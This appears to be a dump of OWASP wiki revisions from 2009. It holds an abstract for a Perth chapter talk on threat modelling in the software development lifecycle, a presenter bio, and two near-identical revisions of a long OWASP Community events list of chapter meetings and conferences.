One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 4/03/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

OWASP Community

2009-03-04T00:41:53Z

Xntrik:

This page is for people to post OWASP related events, such as chapter meetings, OWASP conferences, get-togethers, and OWASP sponsored events.

Events from previous years are archived here:
* '''[[OWASP Community 2006]]'''

This page is monitored, and items posted here will be copied to the OWASP Calendar [[Main Page]]. Please post new items in chronological order using the following format:

'''Mon ## (##:00h) - [[Article]]'''



==Upcoming Events==
=== 2009 ===

'''Mar 11 (17:30h) - [http://www.owasp.org/index.php/Perth_Australia#Upcoming_OWASP_Meeting Perth Chapter Meeting]'''

'''Feb 10 (17:15h) - [http://www.owasp.org/index.php/Perth_Australia#Threat_Modelling_in_the_Software_Development_Lifecycle_.28Feb_2009.29 Perth Chapter Meeting]'''
=== 2008 ===

'''Dec 11 (17:30h) - [http://www.owasp.org/index.php/Netherlands#Announcement_December_11th_2008:_Architectural_and_design_risk_analysis Netherlands Chapter Meeting]'''

'''Dec 3 (17:30h) - [https://www.owasp.org/index.php/Denmark#Local_News Denmark Chapter Meeting]'''

'''Sept 22nd-25th - [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference NY/NJ Metro]'''

'''Aug 21 (18:00h) - [http://www.owasp.org/index.php/Boulder#Next_Meeting Boulder Chapter Meeting]'''

==Past Events==

'''Dec 11 (18:00h) - [[Switzerland|Switzerland chapter meeting]]'''

'''Mar 26 (17:30h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Jan 29 (11:15h) - [[Helsinki|Helsinki chapter and RWSUG seminar]]'''

'''Jan 29 (11:30h) - [[Cincinnati|Cincinnati chapter meeting]]'''

'''Dec 20 (17:30h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Dec 15 (11:00h) - [[Pune|Pune chapter meeting]]'''

'''Dec 12 (18:00h) - [[Chicago|Chicago chapter meeting]]'''

'''Dec 6 (18:00h) - [[London|London chapter meeting]]'''

'''Dec 5 (18:00h) - [[Boston|Possible Boston OWASP Chapter Meeting]] '''

'''Dec 3 (13:00h) - [[Israel|OWASP Israel 2007]] '''

'''Nov 29 (18:00h) -[[Seattle|Seattle Chapter Meeting]] '''

'''Nov 29 (18:00h) -[[Sacramento|Sacramento Chapter Meeting]] '''

'''Nov 26 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Nov 26 (09:30h) - [[Turkey|Turkey Chapter Meeting - Izmir]] '''

'''Nov 24 (13:30h) - [[Turkey|Turkey Chapter Meeting - Ankara]] '''

'''Nov 20 (18:00h) - [[Belgium|Belgium Chapter Meeting]] '''

'''Nov 14 (18:00h) - [[Ottawa|Ottawa Chapter Meeting]] '''

'''Nov 14 (18:00h) - [[Houston|Houston Chapter Meeting]] '''

'''Nov 11 (18:00h) - [[Ireland|Ireland Chapter Meeting]] '''

'''Nov 7 (18:00h) - [[Boston|Possible Boston OWASP Chapter Meeting]] '''

'''Nov 7 (19:00h) - [[Singapore|Singapore OWASP Chapter Meeting]] '''

'''Nov 3 (18:30h) - [[Malaysia|Malaysia OWASP Chapter Meeting]] '''

'''Oct 9 (19:30h) - [[Singapore|Singapore OWASP chapter meeting]]'''

'''Oct 2 (18:30h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Sept 27 (1800h) - [[New York|NY/NJ Metro chapter meeting]]'''

'''Sept 27 (13:00h) - [[Taiwan|Taiwan chapter meeting]]'''

'''Sept 13 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Sept 10 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Sept 7 (15:00h) [[Germany|German chapter meeting]]''' - Restart of the German Chapter

'''Sept (12:00h) - [[Belgium|Belgium OWASP Day Event]] '''

'''Sept 6 (18:00h) - [[Kansas_City|Kansas City Chapter meeting]]'''

'''Sept 5 (18:00h) - [[Chicago|Chicago Chapter Meeting]]'''

'''Sept 5 (17:00h) - [[Israel|Israeli chapter meeting]]'''

'''Sept 5 (18:00h) - [[London|London chapter meeting]]'''

'''July 25 (18:00h) - [[San Jose|San Jose Chapter Meeting]]'''

'''July 24 (17:00h) - [[Switzerland|Switzerland chapter meeting]]'''

'''July 14 (11:00h) - [[Turkey|Turkey chapter meeting - 1st Web Security Days]]'''

'''July 6 (17:00h) - [[Spain|Spain chapter meeting]]'''

'''June 26 (11:30h) - [[Austin|Austin chapter meeting]]''' - Running Web Application Scans

'''June 22 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''June 21 (19:00h) - [[Denver]]''' - Anti-DNS Pinning Attacks / Calculating Return on Security Investment (ROSI)

'''June 19 (18:00h) - [[Minneapolis St Paul|Minneapolis St Paul chapter meeting]]'''

'''June 15 (17:00h) - [[Spain|Spain chapter meeting]]'''

'''June 14 (08:00h) - [[Vietnam|Vietnam chapter meeting]]'''

'''June 13 (18:30h) - [[Kansas City|Kansas City chapter meeting]]'''

'''June 12 (18:00h) - [[New York|NY/NJ Metro chapter meeting]]'''

'''Jun 5 (19:00h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Jun 5 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Jun 5 (17:30h) - [[Houston | Houston Chapter Meeting]]'''

'''May 29 (9:00h) - [[http://www.owasp.org/index.php/Italy#May_29th.2C_2007_-_Seminar:_.22Software_Security.22 Italy@Firenze Tecnologia]]'''

'''May 29 (11:30h) - [[Austin | Austin Chapter Meeting]]''' - Bullet Proof UI - A programmer's guide to the complete idiot".

'''May 29 (18:00h) - [[Ottawa | Ottawa Chapter Meeting]]'''

'''May 22 (18:30h) - [[New Zealand|1st New Zealand chapter Meeting]]'''

'''May 21 (14:00h) - [[Israel|2nd OWASP Israel mini conference]]'''

'''May 15 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''May 10 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''May 9 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''May 8 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''May 6 (11:00h) - [[Turkey|Turkey chapter meeting]]'''

'''May 2 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''May 1 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Apr 26 (11:00h) - [[San Antonio|San Antonio chapter meeting]]'''

'''Apr 26 (17:00h) - [[Switzerland|Switzerland chapter meeting and "Swiss Security Dinner"]]'''

'''Apr 24 (18:00h) - [[Minneapolis St Paul|Minneapolis St Paul chapter meeting]]'''

'''Apr 20 (19:00h) - [[Hong Kong|Hong Kong chapter meeting - Objectives for 2007]]'''

'''Apr 19 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Apr 18 (17:00h) - [[San Francisco City Chapter Meeting]]'''

'''Apr 17 (18:00h) - [[New Jersey|NY/NJ Metro chapter meeting]]'''

'''Apr 17 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Apr 12 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Apr 12 (18:00h) - [[San Jose|San Jose chapter meeting]]'''

'''Apr 11 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Apr 4 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Apr 3 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Mar 30 - [[http://www.owasp.org/index.php/Italy#March_30th.2C_2007_-_Master_in_Security_-_University_of_Rome_.22La_Sapienza.22| Italy@Master in Security at "La Sapienza"]]'''

'''Mar 28 (18:00h) - [[Washington DC|Washington DC (MD) chapter meeting]]'''

'''Mar 28 (11:30h) - [[San Antonio|San Antonio chapter meeting]]'''

; '''Mar 27-30 - [http://www.blackhat.com Black Hat Euro]'''
: OWASP members receive a Euro 100 Briefings discount by inserting BH7EUASSOC in the box marked “Coupon Codes”

'''Mar 22 (18:00h) - [[London|London chapter meeting]]'''

'''Mar 21-22 - [[Belgium#OWASP_Top_10_2007_Update_.28Infosecurity_Belgium.2C_21_.26_.2622_Mar_2007.29|Belgium@InfoSecurity]]'''

'''Mar 20 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Mar 14 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Mar 14 (18:00h) - [[Chicago|Chicago chapter meeting]]'''

'''Mar 13 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Mar 8 (18:00h) - [[Ottawa|Ottawa Chapter Meeting]] '''

'''Mar 7 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Mar 7 (18:30h) - [[Kansas City|Kansas City chapter meeting]]'''

'''Mar 6 (18:30h) - [[Philadelphia|Philadelphia chapter meeting]]'''

'''Mar 6 (18:30h) - [[San Francisco|San Francisco and San Jose chapter meeting]]'''

'''Mar 6 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Mar 5 (11:00h) - [[New Jersey|New Jersey chapter meeting]]'''

'''Mar 1 (11:30h) - [http://www.eusecwest.com/agenda.html EUSecWest 07: Testing Guide]'''

; '''Feb 26-Mar 1 - [http://www.blackhat.com Black Hat DC]'''
: OWASP members receive a $100 Briefings discount by inserting BH7DCASSOC in the box marked “Coupon Codes”

'''Feb 28 (18:00h) - [[Seattle|Seattle chapter meeting]]'''

'''Feb 27 (18:00h) - [[Edmonton|Edmonton chapter meeting]]'''

'''Feb 22 (18:30h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Feb 22 (18:00h) - [[London|London chapter meeting]]'''

'''Feb 21 (18:30h) - [[Denver|Denver chapter meeting]]'''

'''Feb 19 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Feb 15 (18:00h) - [[Washington DC|Washington DC (MD) chapter meeting]]'''

'''Feb 15 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Feb 14 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Feb 13 (18:00h) - [[Ireland|Ireland chapter meeting]]'''

'''Feb 12 (18:30h) - [[Switzerland|Switzerland chapter meeting]]'''

'''Feb 7 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Feb 6-7 - [[Italy#February_6th-8th.2C_2007_-_InfoSecurity|Italy@InfoSecurity]]'''

'''Feb 6 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Feb 2 (14:00h) - [[Chennai|Chennai chapter meeting]]'''

'''Jan 31 (15:00h) - [[Mumbai|Mumbai chapter meeting]]'''

'''Jan 30 (11:30h) - [[Austin|Austin chapter meeting]]'''

'''Jan 25 (18:00h) - [[San Francisco| San Francisco chapter meeting]]'''

'''Jan 25 (14:30h) - [[Italy#October_25th.2C_2007_-_Isaca_Rome|Italy@ISACA Rome]]'''

'''Jan 24 (17:30h) - [[Israel#6th_OWASP_IL_meeting:_Wednesday.2C_January_24th_2007|6th OWASP Israel chapter meeting]]'''

'''Jan 23 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''Jan 22 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Jan 17 (18:30h) - [[Denver|Denver chapter meeting]]'''

'''Jan 16 (17:45h) - [[Edmonton|Edmonton chapter meeting]]'''

'''Jan 11 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Jan 11 (18:30h) - [[Phoenix|Phoenix chapter meeting]]'''

'''Jan 11 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Jan 10 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Jan 8 (18:00h) - [[Seattle|Seattle chapter meeting]]'''

'''Jan 3 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''May 1 - [[Melbourne | Melbourne chapter meeting]]'''

'''May 2 - [[Boston]]'''

'''May 6 - [[Turkey]]'''

'''May 8 - [[Virginia (Northern Virginia)|Washington DC (VA)]]'''

'''May 9 - [[Toronto]]'''

'''May 10 - [[Belgium]]'''

'''May 15 - [[Rochester]]'''

'''May 21 - [[Israel]]'''

'''May 22 - [[New Zealand]]'''

'''May 29 - [[Italy]]'''

'''June 5 - [[Houston]]'''

'''June 5 - [[Melbourne]]'''

'''June 5 - [[Helsinki]]'''

'''June 12 - [[New Jersey]]'''

'''June 15 - [[Spain]]'''

'''July 14 - [[Turkey]]'''

Perth Australia

2009-03-04T00:36:55Z

Xntrik:

OWASP Community

2009-01-23T00:35:12Z

Xntrik:

This page is for people to post OWASP related events, such as chapter meetings, OWASP conferences, get-togethers, and OWASP sponsored events.

Events from previous years are archived here:
* '''[[OWASP Community 2006]]'''

This page is monitored, and items posted here will be copied to the OWASP Calendar [[Main Page]]. Please post new items in chronological order using the following format:

'''Mon ## (##:00h) - [[Article]]'''



==Upcoming Events==
=== 2009 ===

'''Feb 10 (17:15h) - [http://www.owasp.org/index.php/Perth_Australia#Upcoming_OWASP_Meeting Perth Chapter Meeting]'''
=== 2008 ===

'''Dec 11 (17:30h) - [http://www.owasp.org/index.php/Netherlands#Announcement_December_11th_2008:_Architectural_and_design_risk_analysis Netherlands Chapter Meeting]'''

'''Dec 3 (17:30h) - [https://www.owasp.org/index.php/Denmark#Local_News Denmark Chapter Meeting]'''

'''Sept 22nd-25th - [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference NY/NJ Metro]'''

'''Aug 21 (18:00h) - [http://www.owasp.org/index.php/Boulder#Next_Meeting Boulder Chapter Meeting]'''

==Past Events==

'''Dec 11 (18:00h) - [[Switzerland|Switzerland chapter meeting]]'''

'''Mar 26 (17:30h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Jan 29 (11:15h) - [[Helsinki|Helsinki chapter and RWSUG seminar]]'''

'''Jan 29 (11:30h) - [[Cincinnati|Cincinnati chapter meeting]]'''

'''Dec 20 (17:30h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Dec 15 (11:00h) - [[Pune|Pune chapter meeting]]'''

'''Dec 12 (18:00h) - [[Chicago|Chicago chapter meeting]]'''

'''Dec 6 (18:00h) - [[London|London chapter meeting]]'''

'''Dec 5 (18:00h) - [[Boston|Possible Boston OWASP Chapter Meeting]] '''

'''Dec 3 (13:00h) - [[Israel|OWASP Israel 2007]] '''

'''Nov 29 (18:00h) -[[Seattle|Seattle Chapter Meeting]] '''

'''Nov 29 (18:00h) -[[Sacramento|Sacramento Chapter Meeting]] '''

'''Nov 26 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Nov 26 (09:30h) - [[Turkey|Turkey Chapter Meeting - Izmir]] '''

'''Nov 24 (13:30h) - [[Turkey|Turkey Chapter Meeting - Ankara]] '''

'''Nov 20 (18:00h) - [[Belgium|Belgium Chapter Meeting]] '''

'''Nov 14 (18:00h) - [[Ottawa|Ottawa Chapter Meeting]] '''

'''Nov 14 (18:00h) - [[Houston|Houston Chapter Meeting]] '''

'''Nov 11 (18:00h) - [[Ireland|Ireland Chapter Meeting]] '''

'''Nov 7 (18:00h) - [[Boston|Possible Boston OWASP Chapter Meeting]] '''

'''Nov 7 (19:00h) - [[Singapore|Singapore OWASP Chapter Meeting]] '''

'''Nov 3 (18:30h) - [[Malaysia|Malaysia OWASP Chapter Meeting]] '''

'''Oct 9 (19:30h) - [[Singapore|Singapore OWASP chapter meeting]]'''

'''Oct 2 (18:30h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Sept 27 (1800h) - [[New York|NY/NJ Metro chapter meeting]]'''

'''Sept 27 (13:00h) - [[Taiwan|Taiwan chapter meeting]]'''

'''Sept 13 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Sept 10 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Sept 7 (15:00h) [[Germany|German chapter meeting]]''' - Restart of the German Chapter

'''Sept (12:00h) - [[Belgium|Belgium OWASP Day Event]] '''

'''Sept 6 (18:00h) - [[Kansas_City|Kansas City Chapter meeting]]'''

'''Sept 5 (18:00h) - [[Chicago|Chicago Chapter Meeting]]'''

'''Sept 5 (17:00h) - [[Israel|Israeli chapter meeting]]'''

'''Sept 5 (18:00h) - [[London|London chapter meeting]]'''

'''July 25 (18:00h) - [[San Jose|San Jose Chapter Meeting]]'''

'''July 24 (17:00h) - [[Switzerland|Switzerland chapter meeting]]'''

'''July 14 (11:00h) - [[Turkey|Turkey chapter meeting - 1st Web Security Days]]'''

'''July 6 (17:00h) - [[Spain|Spain chapter meeting]]'''

'''June 26 (11:30h) - [[Austin|Austin chapter meeting]]''' - Running Web Application Scans

'''June 22 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''June 21 (19:00h) - [[Denver]]''' - Anti-DNS Pinning Attacks / Calculating Return on Security Investment (ROSI)

'''June 19 (18:00h) - [[Minneapolis St Paul|Minneapolis St Paul chapter meeting]]'''

'''June 15 (17:00h) - [[Spain|Spain chapter meeting]]'''

'''June 14 (08:00h) - [[Vietnam|Vietnam chapter meeting]]'''

'''June 13 (18:30h) - [[Kansas City|Kansas City chapter meeting]]'''

'''June 12 (18:00h) - [[New York|NY/NJ Metro chapter meeting]]'''

'''Jun 5 (19:00h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Jun 5 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Jun 5 (17:30h) - [[Houston | Houston Chapter Meeting]]'''

'''May 29 (9:00h) - [[http://www.owasp.org/index.php/Italy#May_29th.2C_2007_-_Seminar:_.22Software_Security.22 Italy@Firenze Tecnologia]]'''

'''May 29 (11:30h) - [[Austin | Austin Chapter Meeting]]''' - Bullet Proof UI - A programmer's guide to the complete idiot".

'''May 29 (18:00h) - [[Ottawa | Ottawa Chapter Meeting]]'''

'''May 22 (18:30h) - [[New Zealand|1st New Zealand chapter Meeting]]'''

'''May 21 (14:00h) - [[Israel|2nd OWASP Israel mini conference]]'''

'''May 15 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''May 10 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''May 9 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''May 8 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''May 6 (11:00h) - [[Turkey|Turkey chapter meeting]]'''

'''May 2 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''May 1 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Apr 26 (11:00h) - [[San Antonio|San Antonio chapter meeting]]'''

'''Apr 26 (17:00h) - [[Switzerland|Switzerland chapter meeting and "Swiss Security Dinner"]]'''

'''Apr 24 (18:00h) - [[Minneapolis St Paul|Minneapolis St Paul chapter meeting]]'''

'''Apr 20 (19:00h) - [[Hong Kong|Hong Kong chapter meeting - Objectives for 2007]]'''

'''Apr 19 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Apr 18 (17:00h) - [[San Francisco City Chapter Meeting]]'''

'''Apr 17 (18:00h) - [[New Jersey|NY/NJ Metro chapter meeting]]'''

'''Apr 17 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Apr 12 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Apr 12 (18:00h) - [[San Jose|San Jose chapter meeting]]'''

'''Apr 11 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Apr 4 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Apr 3 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Mar 30 - [[http://www.owasp.org/index.php/Italy#March_30th.2C_2007_-_Master_in_Security_-_University_of_Rome_.22La_Sapienza.22| Italy@Master in Security at "La Sapienza"]]'''

'''Mar 28 (18:00h) - [[Washington DC|Washington DC (MD) chapter meeting]]'''

'''Mar 28 (11:30h) - [[San Antonio|San Antonio chapter meeting]]'''

; '''Mar 27-30 - [http://www.blackhat.com Black Hat Euro]'''
: OWASP members receive a Euro 100 Briefings discount by inserting BH7EUASSOC in the box marked “Coupon Codes”

'''Mar 22 (18:00h) - [[London|London chapter meeting]]'''

'''Mar 21-22 - [[Belgium#OWASP_Top_10_2007_Update_.28Infosecurity_Belgium.2C_21_.26_.2622_Mar_2007.29|Belgium@InfoSecurity]]'''

'''Mar 20 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Mar 14 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Mar 14 (18:00h) - [[Chicago|Chicago chapter meeting]]'''

'''Mar 13 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Mar 8 (18:00h) - [[Ottawa|Ottawa Chapter Meeting]] '''

'''Mar 7 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Mar 7 (18:30h) - [[Kansas City|Kansas City chapter meeting]]'''

'''Mar 6 (18:30h) - [[Philadelphia|Philadelphia chapter meeting]]'''

'''Mar 6 (18:30h) - [[San Francisco|San Francisco and San Jose chapter meeting]]'''

'''Mar 6 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Mar 5 (11:00h) - [[New Jersey|New Jersey chapter meeting]]'''

'''Mar 1 (11:30h) - [http://www.eusecwest.com/agenda.html EUSecWest 07: Testing Guide]'''

; '''Feb 26-Mar 1 - [http://www.blackhat.com Black Hat DC]'''
: OWASP members receive a $100 Briefings discount by inserting BH7DCASSOC in the box marked “Coupon Codes”

'''Feb 28 (18:00h) - [[Seattle|Seattle chapter meeting]]'''

'''Feb 27 (18:00h) - [[Edmonton|Edmonton chapter meeting]]'''

'''Feb 22 (18:30h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Feb 22 (18:00h) - [[London|London chapter meeting]]'''

'''Feb 21 (18:30h) - [[Denver|Denver chapter meeting]]'''

'''Feb 19 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Feb 15 (18:00h) - [[Washington DC|Washington DC (MD) chapter meeting]]'''

'''Feb 15 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Feb 14 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Feb 13 (18:00h) - [[Ireland|Ireland chapter meeting]]'''

'''Feb 12 (18:30h) - [[Switzerland|Switzerland chapter meeting]]'''

'''Feb 7 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Feb 6-7 - [[Italy#February_6th-8th.2C_2007_-_InfoSecurity|Italy@InfoSecurity]]'''

'''Feb 6 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Feb 2 (14:00h) - [[Chennai|Chennai chapter meeting]]'''

'''Jan 31 (15:00h) - [[Mumbai|Mumbai chapter meeting]]'''

'''Jan 30 (11:30h) - [[Austin|Austin chapter meeting]]'''

'''Jan 25 (18:00h) - [[San Francisco| San Francisco chapter meeting]]'''

'''Jan 25 (14:30h) - [[Italy#October_25th.2C_2007_-_Isaca_Rome|Italy@ISACA Rome]]'''

'''Jan 24 (17:30h) - [[Israel#6th_OWASP_IL_meeting:_Wednesday.2C_January_24th_2007|6th OWASP Israel chapter meeting]]'''

'''Jan 23 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''Jan 22 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Jan 17 (18:30h) - [[Denver|Denver chapter meeting]]'''

'''Jan 16 (17:45h) - [[Edmonton|Edmonton chapter meeting]]'''

'''Jan 11 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Jan 11 (18:30h) - [[Phoenix|Phoenix chapter meeting]]'''

'''Jan 11 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Jan 10 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Jan 8 (18:00h) - [[Seattle|Seattle chapter meeting]]'''

'''Jan 3 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''May 1 - [[Melbourne | Melbourne chapter meeting]]'''

'''May 2 - [[Boston]]'''

'''May 6 - [[Turkey]]'''

'''May 8 - [[Virginia (Northern Virginia)|Washington DC (VA)]]'''

'''May 9 - [[Toronto]]'''

'''May 10 - [[Belgium]]'''

'''May 15 - [[Rochester]]'''

'''May 21 - [[Israel]]'''

'''May 22 - [[New Zealand]]'''

'''May 29 - [[Italy]]'''

'''June 5 - [[Houston]]'''

'''June 5 - [[Melbourne]]'''

'''June 5 - [[Helsinki]]'''

'''June 12 - [[New Jersey]]'''

'''June 15 - [[Spain]]'''

'''July 14 - [[Turkey]]'''

Perth Australia

2009-01-23T00:31:51Z

Xntrik: